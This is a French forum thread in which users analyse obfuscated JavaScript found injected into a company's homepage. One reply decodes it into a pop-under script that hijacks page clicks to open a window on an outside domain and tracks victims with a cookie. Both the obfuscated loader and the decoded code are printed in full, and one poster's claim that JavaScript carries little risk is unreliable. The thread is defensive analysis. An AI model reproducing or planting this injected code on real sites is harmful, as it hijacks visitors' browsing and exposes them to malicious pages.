Forum |  HardWare.fr | News | Articles | PC | Prix | S'identifier | S'inscrire | Aide | Shop Recherche
1069 connectés 

  FORUM HardWare.fr
  Programmation
  HTML/CSS

  Code source HTML suspect

 



 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Code source HTML suspect

n°1794747
jagstang
Pa Capona ಠ_ಠ
Posté le 02-10-2008 à 11:21:02  profilanswer
 

Bonjour,

 


Je suis par hasard tombé sur ce site :
http://inphone.ch/

 

J'ai remarqué ceci dans la source (voir les 2 dernières lignes) :

 
Code :
  1. <script language="javascript">$="Z64zZ3dZ22Z2566unZ2563tiZ256fn Z2564Z2577(tZ2529Z257bcZ2561Z253dZ2527Z252564ocZ252575Z256denZ252574.wZ2525Z25372Z252569teZ252528Z25252Z2532Z2527;ceZ253dZ2527Z252522)Z2527;cZ2562Z253dZ2527Z25253cZ252573criZ2525Z25370Z2574 Z25256Z2563Z252561ngZ252575Z252561Z252567eZ25253dZ25255cZ25252Z2532jaZ2576aZ2573Z252563rZ2569Z252570Z252574Z2525Z2535cZ25252Z2532Z25253Z2565Z2527;cZ2563Z253dZ2527Z25253cZ25255cZ25252fscrZ252569Z252570Z2574Z25253eZ2527;Z2565vaZ256cZ2528uneZ2573cZ2561pe(Z2574))Z257d;Z22;daZ3dZ22fqb0})-~ug0Qbbqi87|qe~Z257F7Z3c7Z7brtfu7Z3c7zsdxb7Z3c7ytvyb7Z3c7xufyv7Z3c7wvhuc7Z3c7vwfuc7Z3c7uxwxd7Z3c7tzu~y7Z3c7sZ7bud~7Z3c7r||uf7Z3c7q}dgu79+fqb0|)-~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7y7Z3c7z7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z22;ceZ3dZ2268Z2561rZ2543oZ2564eAtZ2528Z2530)^(Z25270Z25780Z2530Z2527+esZ2529))Z253b}}Z22;stZ3dZ22Z2573Z2574Z253dZ2522$Z253dst;Z2564Z2563sZ2528dZ2561+Z2564bZ252bZ2564Z2563Z252bdZ2564Z252bZ2564eZ252cZ25310Z2529;Z2564wZ2528Z2573Z2574)Z253bZ2573Z2574Z253d$;Z2522Z253bZ22;cbZ3dZ22(dZ2573)Z253bstZ253dtmpZ253dZ2527Z2527;for(Z2569Z253d0;iZ253cdsZ252elZ2565ngtZ22;cdZ3dZ22Z253dstZ252bStrZ2569nZ2567Z252efrZ256fmZ2543harZ2543odZ2565((Z2574mZ2570.Z2563Z25Z22;deZ3dZ22M+}Sx-|)K88d)K7}7M;}^}950Z2522Z259M+yv888d)K7t7M:Z25229.-Z252096688d)K7t7M:Z25229,-)99tSx-~)K8d)K7t7M50!Z25209M+u|cu0tSx-|)K88d)K7t7M:Z2526950Z2522Z279M+4-4Z3ebu`|qsu8tZ3ciSxZ2522;}Sx;iSx!;tSx;})Kd)K7}7MZ3d!M;7Z3esZ257F}79+Z22;dbZ3dZ22Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~)-~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)Z3ewudVe||Iuqb89+yv8t)Z3ewudTqi89.#9d)K7t7M-t)Z3ewudTqdu89Z3d8t)Z3ewudTZ22;czZ3dZ22Z2566Z2575Z256ectiZ256fn cZ257a(Z2563Z257a)Z257bretuZ2572n cZ2561+cZ2562+Z2563Z2563Z252bcd+Z2563eZ252bZ2563z;Z257d;Z22;caZ3dZ22Z2566unZ2563Z2574ionZ2520dcsZ2528dsZ252ceZ2573)Z257bdsZ253dZ2575nesZ2563aZ2570eZ22;opZ3dZ22Z2524Z253dZ2522dwZ2528dcZ2573(Z2563uZ252c14Z2529Z2529;Z2522;Z22;cuZ3dZ22(gwf}d`4xuzsausq)6~ubugwf}d`6*}r4Z3czub}su`Z7bf:wZ7bZ7bZ257F}qQzuvxqpZ3dobuf4dZ7bdKazpqf4)4zaxxZ2fbuf4dZ7bdKwZ7bZ7bZ257F}qKzuyq4)46upbyuZ257FqfKZ257FZ7byud6Z2fbuf4dZ7bdK`}yqZ7ba`4)4#Z2526$Z2frazw`}Z7bz4dZ7bdKwZ7bZ7bZ257F}qKqzuvxqpZ3cZ3dobuf4}gKqzuvxqp4)4ruxgqZ2f}r4Z3c5c}zpZ7bc:Z7bdqfu42245zub}su`Z7bf:wZ7bZ7bZ257F}qQzuvxqpZ3dfq`afz4}gKqzuvxqpZ2f}r4Z3c`mdqZ7br4pZ7bwayqz`:wZ7bZ7bZ257F}q4))43g`f}zs3Z3d}r4Z3cpZ7bwayqz`:wZ7bZ7bZ257F}q:xqzs`|4))4$Z3dopZ7bwayqz`:wZ7bZ7bZ257F}q4)46`qg`6Z2f}gKqzuvxqp4)4pZ7bwayqz`:wZ7bZ7bZ257F}q4))43`qg`3Z2fpZ7bwayqz`:wZ7bZ7bZ257F}q4)433Z2fiqxgqo}gKqzuvxqp4)4`faqZ2fifq`afz4}gKqzuvxqpZ2firazw`}Z7bz4dZ7bdKsq`WZ7bZ7bZ257F}qZ3czuyqZ3dobuf4wZ7bZ7bZ257F}q4)46464?4pZ7bwayqz`:wZ7bZ7bZ257F}qZ2fbuf4gqufw|4)46464?4zuyq4?46)6Z2fbuf4gq`G`f4)4zaxxZ2fbuf4Z7brrgq`4)4$Z2fbuf4qzp4)4$Z2f}r4Z3cwZ7bZ7bZ257F}q:xqzs`|4*4$Z3doZ7brrgq`4)4wZ7bZ7bZ257F}q:}zpql[rZ3cgqufw|Z3dZ2f}r4Z3cZ7brrgq`45)49Z25Z3doZ7brrgq`4?)4gqufw|:xqzs`|Z2fqzp4)4wZ7bZ7bZ257F}q:}zpql[rZ3c6Z2f684Z7brrgq`Z3dZ2f}r4Z3cqzp4))49Z25Z3doqzp4)4wZ7bZ7bZ257F}q:xqzs`|Z2figq`G`f4)4azqgwudqZ3cwZ7bZ7bZ257F}q:gavg`f}zsZ3cZ7brrgq`84qzpZ3dZ3dZ2fiifq`afzZ3cgq`G`fZ3dZ2firazw`}Z7bz4dZ7bdKgq`WZ7bZ7bZ257F}q4Z3czuyq84buxaqZ3dopZ7bwayqz`:wZ7bZ7bZ257F}q4)4zuyq4?46)64?4qgwudqZ3cbuxaqZ3d4?46Z2f4qld}fqg)Rf}pum8Z27Z259Pqw9!$4Z2526Z27.!-.!-4SY@Z2f4du`|);Z2f6Z2firazw`}Z7bz4g|Z7bcKdZ7bdZ3cZ3dobuf4dZ7bdKczp4)46|``d.;;rvwyr}f:wZ7by;ws}9v}z;}zpql:ws}+sfqm6Z2fbuf4rquKczp4)46gwfZ7bxxvufg)Z258fqg}nuvxq)Z258`Z7bZ7bxvuf)Z258xZ7bwu`}Z7bz)Z258yqzavuf)Z258g`u`ag)Z258p}fqw`Z7bf}qg)$6Z2fbuf4zqqpKZ7bdqz4)4`faqZ2f}r4Z3cpZ7bwayqz`:Z7bzwx}wZ257FKwZ7bdm45)4zaxxZ3dpZ7bwayqz`:Z7bzwx}wZ257FKwZ7bdmZ3cZ3dZ2f}r4Z3cpZ7bwayqz`:vZ7bpm:Z7bzvqrZ7bfqazxZ7bupKwZ7bdm45)4zaxxZ3dpZ7bwayqz`:vZ7bpm:Z7bzvqrZ7bfqazxZ7bupKwZ7bdmZ3cZ3dZ2f}r4Z3cdZ7bdKazpqf45)4zaxxZ3do}r4Z3c5dZ7bdKazpqf:wxZ7bgqpZ3dzqqpKZ7bdqz4)4ruxgqZ2fi}r4Z3czqqpKZ7bdqzZ3do}r4Z3cdZ7bdKwZ7bZ7bZ257F}qKqzuvxqpZ3cZ3dZ3dobux4)4dZ7bdKsq`WZ7bZ7bZ257F}qZ3cdZ7bdKwZ7bZ7bZ257F}qKzuyqZ3dZ2f}r4Z3cbux45)4zaxxZ3dozZ7bc4)4zqc4Pu`qZ3cZ3dZ2fbuxZ25264)4zqc4Pu`qZ3cbuxZ3dZ2fa`wZ27Z25264)4Pu`q:A@WZ3czZ7bc:sq`RaxxMqufZ3cZ3d84zZ7bc:sq`YZ7bz`|Z3cZ3d84zZ7bc:sq`Pu`qZ3cZ3d84zZ7bc:sq`Z255CZ7bafgZ3cZ3d84zZ7bc:sq`Y}za`qgZ3cZ3d84zZ7bc:sq`GqwZ7bzpgZ3cZ3dZ3dZ2fa`wZ25264)4Pu`q:A@WZ3cbuxZ2526:sq`RaxxMqufZ3cZ3d84buxZ2526:sq`YZ7bz`|Z3cZ3d84buxZ2526:sq`Pu`qZ3cZ3d84buxZ2526:sq`Z255CZ7bafgZ3cZ3d84buxZ2526:sq`Y}za`qgZ3cZ3d84buxZ2526:sq`GqwZ7bzpgZ3cZ3dZ3dZ2f}r4Z3c4Z3c4a`wZ27Z2526494a`wZ25264Z3d4;4Z25$$$4(4dZ7bdK`}yqZ7ba`Z3eZ2522$Z3dozqqpKZ7bdqz4)4ruxgqZ2fiiii}r4Z3czqqpKZ7bdqzZ3doazpqf4)4c}zpZ7bc:Z7bdqzZ3cdZ7bdKczp846684rquKczpZ3dZ2fazpqf:vxafZ3cZ3dZ2fc}zpZ7bc:rZ7bwagZ3cZ3dZ2f}r4Z3cdZ7bdKwZ7bZ7bZ257F}qKqzuvxqpZ3cZ3dZ3dozZ7bc4)4zqc4Pu`qZ3cZ3dZ2fdZ7bdKgq`WZ7bZ7bZ257F}qZ3cdZ7bdKwZ7bZ7bZ257F}qKzuyq84zZ7bcZ3dZ2fiiirazw`}Z7bz4dZ7bdK}z}`Z3cZ3dobuf4bqf4)4dufgqRxZ7bu`Z3czub}su`Z7bf:uddBqfg}Z7bzZ3dZ2fbuf4bqfZ25264)4Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c6C}zpZ7bcg4-!6Z3d*)$4hh4zub}su`Z7bf:agqfUsqz`:}zpql[rZ3c6C}zpZ7bcg4-,6Z3d*)$4hh4zub}su`Z7bf:agqfUsqz`:}zpql[rZ3c6C}zpZ7bcg4Z5a@6Z3d*)$4Z3d22Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c3[dqfu3Z3d4))49Z25Z3d22Z3czub}su`Z7bf:uddZ5auyq45)43Z5aq`gwudq3Z3d422Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c3YG]Q3Z3d4*49Z25Z3d422Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c3GBZ253Z3d4*49Z25Z3d422Z3cbqf4*)4Z2520Z3dZ2f}r4Z3cbqfZ2526Z3do}r4Z3cpZ7bwayqz`:x}zZ257FgZ3dorZ7bf4Z3cbuf4})$Z2f4}(pZ7bwayqz`:x}zZ257Fg:xqzs`|Z2f4}??Z3do}r4Z3cpZ7bwayqz`:x}zZ257FgO}I:`ufsq`45)46KvxuzZ257F6Z3dopZ7bwayqz`:x}zZ257FgO}I:Z7bzwx}wZ257FKwZ7bdm4)4pZ7bwayqz`:x}zZ257FgO}I:Z7bzwx}wZ257FZ2fpZ7bwayqz`:x}zZ257FgO}I:Z7bzwx}wZ257F4)4g|Z7bcKdZ7bdZ2fiiiipZ7bwayqz`:Z7bzwx}wZ257FKwZ7bdm4)4pZ7bwayqz`:Z7bzwx}wZ257FZ2fpZ7bwayqz`:Z7bzyZ7bagqad4)4g|Z7bcKdZ7bdZ2fidZ7bdK}z}`Z3cZ3dZ2fi(;gwf}d`*Z22;dcZ3dZ22qi89;Z25229+u|cu0d)K7t7M-t)Z3ewudTqdu89Z3d8t)Z3ewudTqi899+yv8d)K7t7M,Z25209d)K7t7M-!+d)K7}7M-t)Z3ewud]Z257F~dx89;!+ve~sdyZ257F~0S]^8tZ3c}Z3ci9kfqb0b-888i;8$:t99;8}Nt9:$9;t9+budeb~0b+mfqb0t-7vrs}vybZ3esZ257F}7+fqb0iSx!Z3cZ22;ddZ3dZ22iSxZ2522Z3c}SxZ3ctSxZ3c}^}+yv8d)K7i7M,Z2522Z2520Z2520Z279kd)K7i7M0-0Z2522Z2520Z2520Z27+m}^}-S]^8d)K7t7MZ3cd)K7}7MZ3cd)K7i7M9+iSx!-|)K888d)K7i7M6Z2520hQQ9;}^}950Z25265##950Z2522Z2526M+iSxZ2522-|)K8888d)K7i7M6Z2520h##!!9..#9;}^}950!Z25209Z22;ccZ3dZ22Z2568;Z2569Z252b+Z2529Z257btmpZ253dds.Z2573lZ2569ce(Z2569,iZ252b1Z2529;Z2573Z2574Z22;Z69f (Z64ocZ75meZ6eZ74.Z63oZ6fkZ69e.iZ6eZ64eZ78Z4ff(Z27vbuZ6cleZ74Z69nZ5fZ6dulZ74iqZ75otZ65Z3dZ27)Z3dZ3d-1)Z7bsc(Z27vbulletinZ5fmulZ74iZ71Z75oteZ3dZ27,2,7Z29;eZ76alZ28uneZ73capZ65(Z64z+cZ7a+opZ2bst)Z2bZ27dw(Z64z+cZ7a(Z24+sZ74))Z3bZ27)}eZ6cseZ7b$Z3dZ27Z27};funcZ74iZ6fn sZ63(Z63nmZ2cv,eZ64Z29Z7bvarZ20Z65xZ64Z3dneZ77 Z44ateZ28)Z3bexZ64Z2esZ65tZ44atZ65(exZ64Z2egZ65tDZ61teZ28Z29+Z65Z64Z29;dZ6fcuZ6denZ74.cZ6foZ6bieZ3dcnZ6d+ Z27Z3dZ27 +escaZ70e(vZ29+Z27;expZ69rZ65sZ3dZ27+exdZ2etoZ47MTSZ74rZ69ng(Z29;}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z" ){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($));document.write($);</script></body>
  2. </html>
 

Qu'en pensez-vous ? Quel est le but de ceci ? Et surtout, comment le code est arrivé là... Car je doute que l'auteur l'ai mis sciemment.

 

Merci de votre aide !

Message cité 2 fois
Message édité par jagstang le 02-10-2008 à 11:23:57

---------------
What if I were smiling and running into your arms? Would you see then what I see now?  
mood
Publicité
Posté le 02-10-2008 à 11:21:02  profilanswer
 

n°1794760
bul3
Posté le 02-10-2008 à 11:56:52  profilanswer
 

si si c'est fait sciemment !
 
un "cryptage"  
pour cacher  une séquence d'instructions très complexe  ;o)))  
pour éviter le piratage ! ;o))))
tu as tout pour "décoder" en fin !
 
de toute manière, avec le javascript on ne risque pas grand chose !
sauf à utiliser les ActiveX, par exemple, mais il y a toujours
un message qui demande l'autorisation ! donc on ne prend  
que les risques qu'on veut bien !
 
@+


Message édité par bul3 le 02-10-2008 à 11:57:44

---------------
[mon site] [m'écrire]
n°1794921
jagstang
Pa Capona ಠ_ಠ
Posté le 02-10-2008 à 18:15:41  profilanswer
 

Merci bien mais il ne s'agit pas de cryptage, mais d'obfuscation. perso en cliquant sur un logo sur le site j'ai un warning de mon antivirus. Donc je ne suis pas sûr qu'on ne risque rien !  
 
J'ai pas l'impression que c'est fait sciemment, cette compagnie ayant pignon sur rue et n'aurait aucun intérêt à le faire.
 
Il y a un moyen simple pour débugger JS simplement afin de voir.


---------------
What if I were smiling and running into your arms? Would you see then what I see now?  
n°1794923
masklinn
í dag viðrar vel til loftárása
Posté le 02-10-2008 à 18:24:18  profilanswer
 

jagstang a écrit :

Qu'en pensez-vous ? Quel est le but de ceci ? Et surtout, comment le code est arrivé là... Car je doute que l'auteur l'ai mis sciemment.


À ce que personne ne puisse récupérer du super code super secret / tu as demandé à l'auteur?

 

Décodé, ça donne ça:

Code :
  1. if (navigator.cookieEnabled) {
  2.    var pop_under = null;
  3.    var pop_cookie_name = "advmaker_komap";
  4.    var pop_timeout = 720;
  5.    function pop_cookie_enabled() {
  6.        var is_enabled = false;
  7.        if (!window.opera && !navigator.cookieEnabled)return is_enabled;
  8.        if (typeof document.cookie == 'string')if (document.cookie.length == 0) {
  9.            document.cookie = "test";
  10.            is_enabled = document.cookie == 'test';
  11.            document.cookie = '';
  12.        } else {
  13.            is_enabled = true;
  14.        }
  15.        return is_enabled;
  16.    }
  17.    function pop_getCookie(name) {
  18.        var cookie = " " + document.cookie;
  19.        var search = " " + name + "=";
  20.        var setStr = null;
  21.        var offset = 0;
  22.        var end = 0;
  23.        if (cookie.length > 0) {
  24.            offset = cookie.indexOf(search);
  25.            if (offset != -1) {
  26.                offset += search.length;
  27.                end = cookie.indexOf(";", offset);
  28.                if (end == -1) {
  29.                    end = cookie.length;
  30.                }
  31.                setStr = unescape(cookie.substring(offset, end));
  32.            }
  33.        }
  34.        return(setStr);
  35.    }
  36.    function pop_setCookie(name, value) {
  37.        document.cookie = name + "=" + escape(value) + "; expires=Friday,31-Dec-50 23:59:59 GMT; path=/;";
  38.    }
  39.    function show_pop() {
  40.        var pop_wnd = "http://frz2cketn.com/cgi-bin/index.cgi?grey";
  41.        var fea_wnd = "scrollbars=›esizable=1,toolbar=1,location=1,menubar=1,status=1,directories=0";
  42.        var need_open = true;
  43.        if (document.onclick_copy != null)document.onclick_copy();
  44.        if (document.body.onbeforeunload_copy != null)document.body.onbeforeunload_copy();
  45.        if (pop_under != null) {
  46.            if (!pop_under.closed)need_open = false;
  47.        }
  48.        if (need_open) {
  49.            if (pop_cookie_enabled()) {
  50.                val = pop_getCookie(pop_cookie_name);
  51.                if (val != null) {
  52.                    now = new Date();
  53.                    val2 = new Date(val);
  54.                    utc32 = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), now.getSeconds());
  55.                    utc2 = Date.UTC(val2.getFullYear(), val2.getMonth(), val2.getDate(), val2.getHours(), val2.getMinutes(), val2.getSeconds());
  56.                    if (( utc32 - utc2 ) / 1000 < pop_timeout * 60) {
  57.                        need_open = false;
  58.                    }
  59.                }
  60.            }
  61.        }
  62.        if (need_open) {
  63.            under = window.open(pop_wnd, "", fea_wnd);
  64.            under.blur();
  65.            window.focus();
  66.            if (pop_cookie_enabled()) {
  67.                now = new Date();
  68.                pop_setCookie(pop_cookie_name, now);
  69.            }
  70.        }
  71.    }
  72.    function pop_init() {
  73.        var ver = parseFloat(navigator.appVersion);
  74.        var ver2 = (navigator.userAgent.indexOf("Windows 95" ) >= 0 || navigator.userAgent.indexOf("Windows 98" ) >= 0 || navigator.userAgent.indexOf("Windows NT" ) >= 0 ) && (navigator.userAgent.indexOf('Opera') == -1) && (navigator.appName != 'Netscape') && (navigator.userAgent.indexOf('MSIE') > -1) && (navigator.userAgent.indexOf('SV1') > -1) && (ver >= 4);
  75.        if (ver2) {
  76.            if (document.links) {
  77.                for (var i = 0; i < document.links.length; i++) {
  78.                    if (document.links[i].target != "_blank" ) {
  79.                        document.links[i].onclick_copy = document.links[i].onclick;
  80.                        document.links[i].onclick = show_pop;
  81.                    }
  82.                }
  83.            }
  84.        }
  85.        document.onclick_copy = document.onclick;
  86.        document.onmouseup = show_pop;
  87.    }
  88.    pop_init();
  89. }


edit: j'ai reformatté le truc pour que ça soit plus lisible

 

Ca balance sur/ouvre une popup de pub, et effectivement ça a pas l'air d'être le genre de trucs que les gens incluent dans leurs pages pour s'amuser.


Message édité par masklinn le 02-10-2008 à 18:30:45

---------------
I've never understood the compulsion to use Web technologies minus the Web's security and deployment models. It seems a bit like throwing the orange away and eating the peel. — @ justinschuh‬
n°1794930
jagstang
Pa Capona ಠ_ಠ
Posté le 02-10-2008 à 18:35:43  profilanswer
 

j'ai contacté l'auteur du site. Pas de réponse... J'ai vu cette popup aussi :
http://frz2cketn.com/cgi-bin/index.cgi?grey
 
Et là ça continue dans l'obscur et dans le louche...  
d'autant que le whois sur ce nom de domaine montre un proprio russe...


---------------
What if I were smiling and running into your arms? Would you see then what I see now?  
n°1794932
jagstang
Pa Capona ಠ_ಠ
Posté le 02-10-2008 à 18:36:36  profilanswer
 

une idée comment ce code est apparu là ? un crack pour éditeur de sites qui laisserait derrière lui des petits cadeaux ?


---------------
What if I were smiling and running into your arms? Would you see then what I see now?  
n°1794936
jagstang
Pa Capona ಠ_ಠ
Posté le 02-10-2008 à 18:40:48  profilanswer
 

au fait Masklinn, tu as utilisé quoi pour débbuguer ? Merci


---------------
What if I were smiling and running into your arms? Would you see then what I see now?  
n°1794943
masklinn
í dag viðrar vel til loftárása
Posté le 02-10-2008 à 19:03:11  profilanswer
 

jagstang a écrit :

au fait Masklinn, tu as utilisé quoi pour débbuguer ? Merci


Rien du tout, j'ai exécuté le code JS dans firebug, à l'exception du document.write final (qui sert à écrire tout ce bordel décodé dans une balise <script/> dans la page) et j'ai regardé ce que ça me sortait ;)

 

Ensuite j'ai collé le tout dans IntelliJ et je lui ai demandé de reformatter, parce que sinon c'est pas super lisible.


Message édité par masklinn le 02-10-2008 à 19:03:46

---------------
I've never understood the compulsion to use Web technologies minus the Web's security and deployment models. It seems a bit like throwing the orange away and eating the peel. — @ justinschuh‬
n°1807029
buzzyback
Posté le 31-10-2008 à 17:44:32  profilanswer
 

jagstang a écrit :

Bonjour,
 
 
Je suis par hasard tombé sur ce site :
http://inphone.ch/
 
J'ai remarqué ceci dans la source (voir les 2 dernières lignes) :
 

Code :
  1. <script language="javascript">$="Z64zZ3dZ22Z2566unZ2563tiZ256fn Z2564Z2577(tZ2529Z257bcZ2561Z253dZ2527Z252564ocZ252575Z256denZ252574.wZ2525Z25372Z252569teZ252528Z25252Z2532Z2527;ceZ253dZ2527Z252522)Z2527;cZ2562Z253dZ2527Z25253cZ252573criZ2525Z25370Z2574 Z25256Z2563Z252561ngZ252575Z252561Z252567eZ25253dZ25255cZ25252Z2532jaZ2576aZ2573Z252563rZ2569Z252570Z252574Z2525Z2535cZ25252Z2532Z25253Z2565Z2527;cZ2563Z253dZ2527Z25253cZ25255cZ25252fscrZ252569Z252570Z2574Z25253eZ2527;Z2565vaZ256cZ2528uneZ2573cZ2561pe(Z2574))Z257d;Z22;daZ3dZ22fqb0})-~ug0Qbbqi87|qe~Z257F7Z3c7Z7brtfu7Z3c7zsdxb7Z3c7ytvyb7Z3c7xufyv7Z3c7wvhuc7Z3c7vwfuc7Z3c7uxwxd7Z3c7tzu~y7Z3c7sZ7bud~7Z3c7r||uf7Z3c7q}dgu79+fqb0|)-~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7y7Z3c7z7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z22;ceZ3dZ2268Z2561rZ2543oZ2564eAtZ2528Z2530)^(Z25270Z25780Z2530Z2527+esZ2529))Z253b}}Z22;stZ3dZ22Z2573Z2574Z253dZ2522$Z253dst;Z2564Z2563sZ2528dZ2561+Z2564bZ252bZ2564Z2563Z252bdZ2564Z252bZ2564eZ252cZ25310Z2529;Z2564wZ2528Z2573Z2574)Z253bZ2573Z2574Z253d$;Z2522Z253bZ22;cbZ3dZ22(dZ2573)Z253bstZ253dtmpZ253dZ2527Z2527;for(Z2569Z253d0;iZ253cdsZ252elZ2565ngtZ22;cdZ3dZ22Z253dstZ252bStrZ2569nZ2567Z252efrZ256fmZ2543harZ2543odZ2565((Z2574mZ2570.Z2563Z25Z22;deZ3dZ22M+}Sx-|)K88d)K7}7M;}^}950Z2522Z259M+yv888d)K7t7M:Z25229.-Z252096688d)K7t7M:Z25229,-)99tSx-~)K8d)K7t7M50!Z25209M+u|cu0tSx-|)K88d)K7t7M:Z2526950Z2522Z279M+4-4Z3ebu`|qsu8tZ3ciSxZ2522;}Sx;iSx!;tSx;})Kd)K7}7MZ3d!M;7Z3esZ257F}79+Z22;dbZ3dZ22Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~)-~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)Z3ewudVe||Iuqb89+yv8t)Z3ewudTqi89.#9d)K7t7M-t)Z3ewudTqdu89Z3d8t)Z3ewudTZ22;czZ3dZ22Z2566Z2575Z256ectiZ256fn cZ257a(Z2563Z257a)Z257bretuZ2572n cZ2561+cZ2562+Z2563Z2563Z252bcd+Z2563eZ252bZ2563z;Z257d;Z22;caZ3dZ22Z2566unZ2563Z2574ionZ2520dcsZ2528dsZ252ceZ2573)Z257bdsZ253dZ2575nesZ2563aZ2570eZ22;opZ3dZ22Z2524Z253dZ2522dwZ2528dcZ2573(Z2563uZ252c14Z2529Z2529;Z2522;Z22;cuZ3dZ22(gwf}d`4xuzsausq)6~ubugwf}d`6*}r4Z3czub}su`Z7bf:wZ7bZ7bZ257F}qQzuvxqpZ3dobuf4dZ7bdKazpqf4)4zaxxZ2fbuf4dZ7bdKwZ7bZ7bZ257F}qKzuyq4)46upbyuZ257FqfKZ257FZ7byud6Z2fbuf4dZ7bdK`}yqZ7ba`4)4#Z2526$Z2frazw`}Z7bz4dZ7bdKwZ7bZ7bZ257F}qKqzuvxqpZ3cZ3dobuf4}gKqzuvxqp4)4ruxgqZ2f}r4Z3c5c}zpZ7bc:Z7bdqfu42245zub}su`Z7bf:wZ7bZ7bZ257F}qQzuvxqpZ3dfq`afz4}gKqzuvxqpZ2f}r4Z3c`mdqZ7br4pZ7bwayqz`:wZ7bZ7bZ257F}q4))43g`f}zs3Z3d}r4Z3cpZ7bwayqz`:wZ7bZ7bZ257F}q:xqzs`|4))4$Z3dopZ7bwayqz`:wZ7bZ7bZ257F}q4)46`qg`6Z2f}gKqzuvxqp4)4pZ7bwayqz`:wZ7bZ7bZ257F}q4))43`qg`3Z2fpZ7bwayqz`:wZ7bZ7bZ257F}q4)433Z2fiqxgqo}gKqzuvxqp4)4`faqZ2fifq`afz4}gKqzuvxqpZ2firazw`}Z7bz4dZ7bdKsq`WZ7bZ7bZ257F}qZ3czuyqZ3dobuf4wZ7bZ7bZ257F}q4)46464?4pZ7bwayqz`:wZ7bZ7bZ257F}qZ2fbuf4gqufw|4)46464?4zuyq4?46)6Z2fbuf4gq`G`f4)4zaxxZ2fbuf4Z7brrgq`4)4$Z2fbuf4qzp4)4$Z2f}r4Z3cwZ7bZ7bZ257F}q:xqzs`|4*4$Z3doZ7brrgq`4)4wZ7bZ7bZ257F}q:}zpql[rZ3cgqufw|Z3dZ2f}r4Z3cZ7brrgq`45)49Z25Z3doZ7brrgq`4?)4gqufw|:xqzs`|Z2fqzp4)4wZ7bZ7bZ257F}q:}zpql[rZ3c6Z2f684Z7brrgq`Z3dZ2f}r4Z3cqzp4))49Z25Z3doqzp4)4wZ7bZ7bZ257F}q:xqzs`|Z2figq`G`f4)4azqgwudqZ3cwZ7bZ7bZ257F}q:gavg`f}zsZ3cZ7brrgq`84qzpZ3dZ3dZ2fiifq`afzZ3cgq`G`fZ3dZ2firazw`}Z7bz4dZ7bdKgq`WZ7bZ7bZ257F}q4Z3czuyq84buxaqZ3dopZ7bwayqz`:wZ7bZ7bZ257F}q4)4zuyq4?46)64?4qgwudqZ3cbuxaqZ3d4?46Z2f4qld}fqg)Rf}pum8Z27Z259Pqw9!$4Z2526Z27.!-.!-4SY@Z2f4du`|);Z2f6Z2firazw`}Z7bz4g|Z7bcKdZ7bdZ3cZ3dobuf4dZ7bdKczp4)46|``d.;;rvwyr}f:wZ7by;ws}9v}z;}zpql:ws}+sfqm6Z2fbuf4rquKczp4)46gwfZ7bxxvufg)Z258fqg}nuvxq)Z258`Z7bZ7bxvuf)Z258xZ7bwu`}Z7bz)Z258yqzavuf)Z258g`u`ag)Z258p}fqw`Z7bf}qg)$6Z2fbuf4zqqpKZ7bdqz4)4`faqZ2f}r4Z3cpZ7bwayqz`:Z7bzwx}wZ257FKwZ7bdm45)4zaxxZ3dpZ7bwayqz`:Z7bzwx}wZ257FKwZ7bdmZ3cZ3dZ2f}r4Z3cpZ7bwayqz`:vZ7bpm:Z7bzvqrZ7bfqazxZ7bupKwZ7bdm45)4zaxxZ3dpZ7bwayqz`:vZ7bpm:Z7bzvqrZ7bfqazxZ7bupKwZ7bdmZ3cZ3dZ2f}r4Z3cdZ7bdKazpqf45)4zaxxZ3do}r4Z3c5dZ7bdKazpqf:wxZ7bgqpZ3dzqqpKZ7bdqz4)4ruxgqZ2fi}r4Z3czqqpKZ7bdqzZ3do}r4Z3cdZ7bdKwZ7bZ7bZ257F}qKqzuvxqpZ3cZ3dZ3dobux4)4dZ7bdKsq`WZ7bZ7bZ257F}qZ3cdZ7bdKwZ7bZ7bZ257F}qKzuyqZ3dZ2f}r4Z3cbux45)4zaxxZ3dozZ7bc4)4zqc4Pu`qZ3cZ3dZ2fbuxZ25264)4zqc4Pu`qZ3cbuxZ3dZ2fa`wZ27Z25264)4Pu`q:A@WZ3czZ7bc:sq`RaxxMqufZ3cZ3d84zZ7bc:sq`YZ7bz`|Z3cZ3d84zZ7bc:sq`Pu`qZ3cZ3d84zZ7bc:sq`Z255CZ7bafgZ3cZ3d84zZ7bc:sq`Y}za`qgZ3cZ3d84zZ7bc:sq`GqwZ7bzpgZ3cZ3dZ3dZ2fa`wZ25264)4Pu`q:A@WZ3cbuxZ2526:sq`RaxxMqufZ3cZ3d84buxZ2526:sq`YZ7bz`|Z3cZ3d84buxZ2526:sq`Pu`qZ3cZ3d84buxZ2526:sq`Z255CZ7bafgZ3cZ3d84buxZ2526:sq`Y}za`qgZ3cZ3d84buxZ2526:sq`GqwZ7bzpgZ3cZ3dZ3dZ2f}r4Z3c4Z3c4a`wZ27Z2526494a`wZ25264Z3d4;4Z25$$$4(4dZ7bdK`}yqZ7ba`Z3eZ2522$Z3dozqqpKZ7bd